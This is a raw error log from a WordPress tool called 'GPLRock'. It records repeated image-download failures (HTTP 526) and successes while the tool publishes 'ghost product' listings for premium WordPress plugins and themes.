https://meldwp.com/wp-content/uploads/boat--yacht-charter-booking-system-for-wordpress-8926.webp for product boat-yacht-charter-booking-system-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:39 UTC] GPLRock: Image download failed for product boat-yacht-charter-booking-system-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:42 UTC] GPLRock: Image download failed for product boat-yacht-charter-booking-system-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boat--yacht-charter-booking-system-for-wordpress-8926.webp for product boat-yacht-charter-booking-system-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:44 UTC] GPLRock WARNING: Image download failed for product boat-yacht-charter-booking-system-for-wordpress. URL: https://meldwp.com/wp-content/uploads/boat--yacht-charter-booking-system-for-wordpress-8926.webp [05-Apr-2026 17:50:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: boat-yacht-charter-booking-system-for-wordpress [05-Apr-2026 17:50:44 UTC] GPLRock: Image download failed for product blog-post-layouts-for-gutenberg-and-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:46 UTC] GPLRock: Image download failed for product blog-post-layouts-for-gutenberg-and-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-post-layouts-for-gutenberg-and-elementor-13343.webp for product blog-post-layouts-for-gutenberg-and-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:48 UTC] GPLRock: Image download failed for product blog-post-layouts-for-gutenberg-and-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:50 UTC] GPLRock: Image download failed for product blog-post-layouts-for-gutenberg-and-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-post-layouts-for-gutenberg-and-elementor-13343.webp for product blog-post-layouts-for-gutenberg-and-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:52 UTC] GPLRock WARNING: Image download failed for product blog-post-layouts-for-gutenberg-and-elementor. URL: https://meldwp.com/wp-content/uploads/blog-post-layouts-for-gutenberg-and-elementor-13343.webp [05-Apr-2026 17:50:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blog-post-layouts-for-gutenberg-and-elementor [05-Apr-2026 17:50:52 UTC] GPLRock: Image downloaded successfully for product feedblitz-addon-for-userpro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-45e46b01.webp [05-Apr-2026 17:50:52 UTC] GPLRock: Using pre-downloaded image for product feedblitz-addon-for-userpro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-45e46b01.webp [05-Apr-2026 17:50:52 UTC] GPLRock: Ghost product published with image - Product ID: feedblitz-addon-for-userpro [05-Apr-2026 17:50:53 UTC] GPLRock: Image download failed for product nest-multivendor-organic-grocery-laravel-ecommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:55 UTC] GPLRock: Image download failed for product nest-multivendor-organic-grocery-laravel-ecommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nest---multivendor-organic--grocery-laravel-ecommerce-14662.webp for product nest-multivendor-organic-grocery-laravel-ecommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:50:57 UTC] GPLRock: Image download failed for product nest-multivendor-organic-grocery-laravel-ecommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:50:59 UTC] GPLRock: Image download failed for product nest-multivendor-organic-grocery-laravel-ecommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:51:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nest---multivendor-organic--grocery-laravel-ecommerce-14662.webp for product nest-multivendor-organic-grocery-laravel-ecommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:51:01 UTC] GPLRock WARNING: Image download failed for product nest-multivendor-organic-grocery-laravel-ecommerce. URL: https://meldwp.com/wp-content/uploads/nest---multivendor-organic--grocery-laravel-ecommerce-14662.webp [05-Apr-2026 17:51:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nest-multivendor-organic-grocery-laravel-ecommerce [05-Apr-2026 17:51:01 UTC] GPLRock: Image download failed for product woocommerce-measurement-price-calculator-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:51:03 UTC] GPLRock: Image download failed for product woocommerce-measurement-price-calculator-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:51:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-measurement-price-calculator-plugin-26892.webp for product woocommerce-measurement-price-calculator-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:51:06 UTC] GPLRock: Image download failed for product woocommerce-measurement-price-calculator-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:51:08 UTC] GPLRock: Image download failed for product woocommerce-measurement-price-calculator-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:51:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-measurement-price-calculator-plugin-26892.webp for product woocommerce-measurement-price-calculator-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:51:10 UTC] GPLRock WARNING: Image download failed for product woocommerce-measurement-price-calculator-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-measurement-price-calculator-plugin-26892.webp [05-Apr-2026 17:51:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-measurement-price-calculator-plugin [05-Apr-2026 17:53:36 UTC] GPLRock: Image downloaded successfully for product woocommerce-sequential-order-numbers-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a8aa90e.jpg [05-Apr-2026 17:53:36 UTC] GPLRock: Using pre-downloaded image for product woocommerce-sequential-order-numbers-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6a8aa90e.jpg [05-Apr-2026 17:53:36 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-sequential-order-numbers-pro [05-Apr-2026 17:53:37 UTC] GPLRock: Image downloaded successfully for product facetwp-beaver-builder-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e72e651c.jpg [05-Apr-2026 17:53:37 UTC] GPLRock: Using pre-downloaded image for product facetwp-beaver-builder-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e72e651c.jpg [05-Apr-2026 17:53:37 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-beaver-builder-integration [05-Apr-2026 17:53:39 UTC] GPLRock: Image downloaded successfully for product gravity-forms-2checkout-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1cbfe85e.jpg [05-Apr-2026 17:53:39 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-2checkout-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1cbfe85e.jpg [05-Apr-2026 17:53:39 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-2checkout-addon [05-Apr-2026 17:53:40 UTC] GPLRock: Image downloaded successfully for product elmastudio-oita-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0954eef8.jpg [05-Apr-2026 17:53:40 UTC] GPLRock: Using pre-downloaded image for product elmastudio-oita-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0954eef8.jpg [05-Apr-2026 17:53:40 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-oita-wordpress-theme [05-Apr-2026 17:53:42 UTC] GPLRock: Image downloaded successfully for product memberpress-constant-contact (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9284900f.jpg [05-Apr-2026 17:53:42 UTC] GPLRock: Using pre-downloaded image for product memberpress-constant-contact: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9284900f.jpg [05-Apr-2026 17:53:42 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-constant-contact [05-Apr-2026 17:53:43 UTC] GPLRock: Image downloaded successfully for product woocommerce-paytrail (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-28e28222.jpg [05-Apr-2026 17:53:43 UTC] GPLRock: Using pre-downloaded image for product woocommerce-paytrail: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-28e28222.jpg [05-Apr-2026 17:53:43 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-paytrail [05-Apr-2026 17:53:45 UTC] GPLRock: Image downloaded successfully for product give-email-reports (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40154dfa.jpg [05-Apr-2026 17:53:45 UTC] GPLRock: Using pre-downloaded image for product give-email-reports: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-40154dfa.jpg [05-Apr-2026 17:53:45 UTC] GPLRock: Ghost product published with image - Product ID: give-email-reports [05-Apr-2026 17:53:46 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-s3 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-57673bb0.jpg [05-Apr-2026 17:53:46 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-s3: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-57673bb0.jpg [05-Apr-2026 17:53:46 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-s3 [05-Apr-2026 17:53:48 UTC] GPLRock: Image downloaded successfully for product ninja-forms-onepagecrm (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07ce60c8.jpg [05-Apr-2026 17:53:48 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-onepagecrm: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07ce60c8.jpg [05-Apr-2026 17:53:48 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-onepagecrm [05-Apr-2026 17:53:49 UTC] GPLRock: Image downloaded successfully for product privatecontent-mail-actions-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df94f159.jpg [05-Apr-2026 17:53:49 UTC] GPLRock: Using pre-downloaded image for product privatecontent-mail-actions-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df94f159.jpg [05-Apr-2026 17:53:49 UTC] GPLRock: Ghost product published with image - Product ID: privatecontent-mail-actions-add-on [05-Apr-2026 17:56:26 UTC] GPLRock: Image download failed for product scooby-pet-care-and-pet-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:28 UTC] GPLRock: Image download failed for product scooby-pet-care-and-pet-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scooby---pet-care-and-pet-shop-wordpress-theme-16194.webp for product scooby-pet-care-and-pet-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:56:30 UTC] GPLRock: Image download failed for product scooby-pet-care-and-pet-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:32 UTC] GPLRock: Image download failed for product scooby-pet-care-and-pet-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scooby---pet-care-and-pet-shop-wordpress-theme-16194.webp for product scooby-pet-care-and-pet-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:56:34 UTC] GPLRock WARNING: Image download failed for product scooby-pet-care-and-pet-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/scooby---pet-care-and-pet-shop-wordpress-theme-16194.webp [05-Apr-2026 17:56:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: scooby-pet-care-and-pet-shop-wordpress-theme [05-Apr-2026 17:56:35 UTC] GPLRock: Image downloaded successfully for product candy-one-multi-page-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6572516f.webp [05-Apr-2026 17:56:35 UTC] GPLRock: Using pre-downloaded image for product candy-one-multi-page-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6572516f.webp [05-Apr-2026 17:56:35 UTC] GPLRock: Ghost product published with image - Product ID: candy-one-multi-page-wordpress-theme [05-Apr-2026 17:56:35 UTC] GPLRock: Image download failed for product my-church-religion-wordpress-theme-with-events-donations-sermons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:37 UTC] GPLRock: Image download failed for product my-church-religion-wordpress-theme-with-events-donations-sermons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/my-church---religion-wordpress-theme-with-events-donations--sermons-21425.webp for product my-church-religion-wordpress-theme-with-events-donations-sermons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:56:39 UTC] GPLRock: Image download failed for product my-church-religion-wordpress-theme-with-events-donations-sermons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:41 UTC] GPLRock: Image download failed for product my-church-religion-wordpress-theme-with-events-donations-sermons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/my-church---religion-wordpress-theme-with-events-donations--sermons-21425.webp for product my-church-religion-wordpress-theme-with-events-donations-sermons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:56:43 UTC] GPLRock WARNING: Image download failed for product my-church-religion-wordpress-theme-with-events-donations-sermons. URL: https://meldwp.com/wp-content/uploads/my-church---religion-wordpress-theme-with-events-donations--sermons-21425.webp [05-Apr-2026 17:56:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: my-church-religion-wordpress-theme-with-events-donations-sermons [05-Apr-2026 17:56:43 UTC] GPLRock: Image download failed for product holdings-realty-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:45 UTC] GPLRock: Image download failed for product holdings-realty-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/holdings-realty---single-property-wordpress-theme-10645.webp for product holdings-realty-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:56:48 UTC] GPLRock: Image download failed for product holdings-realty-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:50 UTC] GPLRock: Image download failed for product holdings-realty-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/holdings-realty---single-property-wordpress-theme-10645.webp for product holdings-realty-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:56:52 UTC] GPLRock WARNING: Image download failed for product holdings-realty-single-property-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/holdings-realty---single-property-wordpress-theme-10645.webp [05-Apr-2026 17:56:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: holdings-realty-single-property-wordpress-theme [05-Apr-2026 17:56:52 UTC] GPLRock: Image download failed for product kalkulat-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:54 UTC] GPLRock: Image download failed for product kalkulat-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kalkulat---multipurpose-business-wordpress-theme-1174.webp for product kalkulat-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:56:56 UTC] GPLRock: Image download failed for product kalkulat-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:56:58 UTC] GPLRock: Image download failed for product kalkulat-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kalkulat---multipurpose-business-wordpress-theme-1174.webp for product kalkulat-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:01 UTC] GPLRock WARNING: Image download failed for product kalkulat-multipurpose-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kalkulat---multipurpose-business-wordpress-theme-1174.webp [05-Apr-2026 17:57:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kalkulat-multipurpose-business-wordpress-theme [05-Apr-2026 17:57:01 UTC] GPLRock: Image download failed for product luxwine-wine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:03 UTC] GPLRock: Image download failed for product luxwine-wine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxwine---wine-wordpress-theme-18072.webp for product luxwine-wine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:05 UTC] GPLRock: Image download failed for product luxwine-wine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:07 UTC] GPLRock: Image download failed for product luxwine-wine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxwine---wine-wordpress-theme-18072.webp for product luxwine-wine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:09 UTC] GPLRock WARNING: Image download failed for product luxwine-wine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luxwine---wine-wordpress-theme-18072.webp [05-Apr-2026 17:57:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxwine-wine-wordpress-theme [05-Apr-2026 17:57:09 UTC] GPLRock: Image download failed for product hanio-honey-sweets-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:12 UTC] GPLRock: Image download failed for product hanio-honey-sweets-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hanio---honey--sweets-store-wordpress-theme-12315.webp for product hanio-honey-sweets-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:14 UTC] GPLRock: Image download failed for product hanio-honey-sweets-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:16 UTC] GPLRock: Image download failed for product hanio-honey-sweets-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hanio---honey--sweets-store-wordpress-theme-12315.webp for product hanio-honey-sweets-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:18 UTC] GPLRock WARNING: Image download failed for product hanio-honey-sweets-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hanio---honey--sweets-store-wordpress-theme-12315.webp [05-Apr-2026 17:57:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hanio-honey-sweets-store-wordpress-theme [05-Apr-2026 17:57:18 UTC] GPLRock: Image download failed for product jobbox-job-board-career-portal-recruitment-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:20 UTC] GPLRock: Image download failed for product jobbox-job-board-career-portal-recruitment-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jobbox---job-board--career-portal-recruitment-agency-wordpress-theme-3042.webp for product jobbox-job-board-career-portal-recruitment-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:22 UTC] GPLRock: Image download failed for product jobbox-job-board-career-portal-recruitment-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:24 UTC] GPLRock: Image download failed for product jobbox-job-board-career-portal-recruitment-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jobbox---job-board--career-portal-recruitment-agency-wordpress-theme-3042.webp for product jobbox-job-board-career-portal-recruitment-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:27 UTC] GPLRock WARNING: Image download failed for product jobbox-job-board-career-portal-recruitment-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jobbox---job-board--career-portal-recruitment-agency-wordpress-theme-3042.webp [05-Apr-2026 17:57:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jobbox-job-board-career-portal-recruitment-agency-wordpress-theme [05-Apr-2026 17:57:27 UTC] GPLRock: Image download failed for product pasto-restaurant-cafe-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:29 UTC] GPLRock: Image download failed for product pasto-restaurant-cafe-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pasto---restaurant--cafe-responsive-wordpress-theme-28878.webp for product pasto-restaurant-cafe-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:31 UTC] GPLRock: Image download failed for product pasto-restaurant-cafe-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:33 UTC] GPLRock: Image download failed for product pasto-restaurant-cafe-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pasto---restaurant--cafe-responsive-wordpress-theme-28878.webp for product pasto-restaurant-cafe-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:35 UTC] GPLRock WARNING: Image download failed for product pasto-restaurant-cafe-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pasto---restaurant--cafe-responsive-wordpress-theme-28878.webp [05-Apr-2026 17:57:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pasto-restaurant-cafe-responsive-wordpress-theme [05-Apr-2026 17:57:35 UTC] GPLRock: Image download failed for product muffle-roofing-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:38 UTC] GPLRock: Image download failed for product muffle-roofing-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muffle---roofing-company-wordpress-theme-7970.webp for product muffle-roofing-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:40 UTC] GPLRock: Image download failed for product muffle-roofing-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:42 UTC] GPLRock: Image download failed for product muffle-roofing-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 17:57:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muffle---roofing-company-wordpress-theme-7970.webp for product muffle-roofing-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 17:57:44 UTC] GPLRock WARNING: Image download failed for product muffle-roofing-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/muffle---roofing-company-wordpress-theme-7970.webp [05-Apr-2026 17:57:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: muffle-roofing-company-wordpress-theme [05-Apr-2026 17:58:23 UTC] GPLRock: Image downloaded successfully for product fashable-stylist-ecommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bc54b34.webp [05-Apr-2026 17:58:23 UTC] GPLRock: Using pre-downloaded image for product fashable-stylist-ecommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bc54b34.webp [05-Apr-2026 17:58:23 UTC] GPLRock: Ghost product published with image - Product ID: fashable-stylist-ecommerce-elementor-template-kit [05-Apr-2026 17:58:25 UTC] GPLRock: Image downloaded successfully for product fasha-woman-fashion-shop-ecommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39b928f4.webp [05-Apr-2026 17:58:25 UTC] GPLRock: Using pre-downloaded image for product fasha-woman-fashion-shop-ecommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39b928f4.webp [05-Apr-2026 17:58:25 UTC] GPLRock: Ghost product published with image - Product ID: fasha-woman-fashion-shop-ecommerce-elementor-template-kit [05-Apr-2026 17:58:26 UTC] GPLRock: Image downloaded successfully for product fash-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98cb75a8.webp [05-Apr-2026 17:58:26 UTC] GPLRock: Using pre-downloaded image for product fash-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98cb75a8.webp [05-Apr-2026 17:58:26 UTC] GPLRock: Ghost product published with image - Product ID: fash-woocommerce-elementor-template-kit [05-Apr-2026 17:58:27 UTC] GPLRock: Image downloaded successfully for product farren-cv-resume-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-591b225f.webp [05-Apr-2026 17:58:27 UTC] GPLRock: Using pre-downloaded image for product farren-cv-resume-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-591b225f.webp [05-Apr-2026 17:58:27 UTC] GPLRock: Ghost product published with image - Product ID: farren-cv-resume-elementor-template-kit [05-Apr-2026 17:58:28 UTC] GPLRock: Image downloaded successfully for product ergo-bike-cycling-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e0d1ff33.webp [05-Apr-2026 17:58:28 UTC] GPLRock: Using pre-downloaded image for product ergo-bike-cycling-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e0d1ff33.webp [05-Apr-2026 17:58:28 UTC] GPLRock: Ghost product published with image - Product ID: ergo-bike-cycling-woocommerce-elementor-template-kit [05-Apr-2026 17:58:30 UTC] GPLRock: Image downloaded successfully for product ereco-architecture-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-96b9eb7e.webp [05-Apr-2026 17:58:30 UTC] GPLRock: Using pre-downloaded image for product ereco-architecture-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-96b9eb7e.webp [05-Apr-2026 17:58:30 UTC] GPLRock: Ghost product published with image - Product ID: ereco-architecture-interior-design-elementor-template-kit [05-Apr-2026 17:58:31 UTC] GPLRock: Image downloaded successfully for product envarch-architecture-single-property-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-73408259.jpg [05-Apr-2026 17:58:32 UTC] GPLRock: Using pre-downloaded image for product envarch-architecture-single-property-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-73408259.jpg [05-Apr-2026 17:58:32 UTC] GPLRock: Ghost product published with image - Product ID: envarch-architecture-single-property-elementor-template-kit 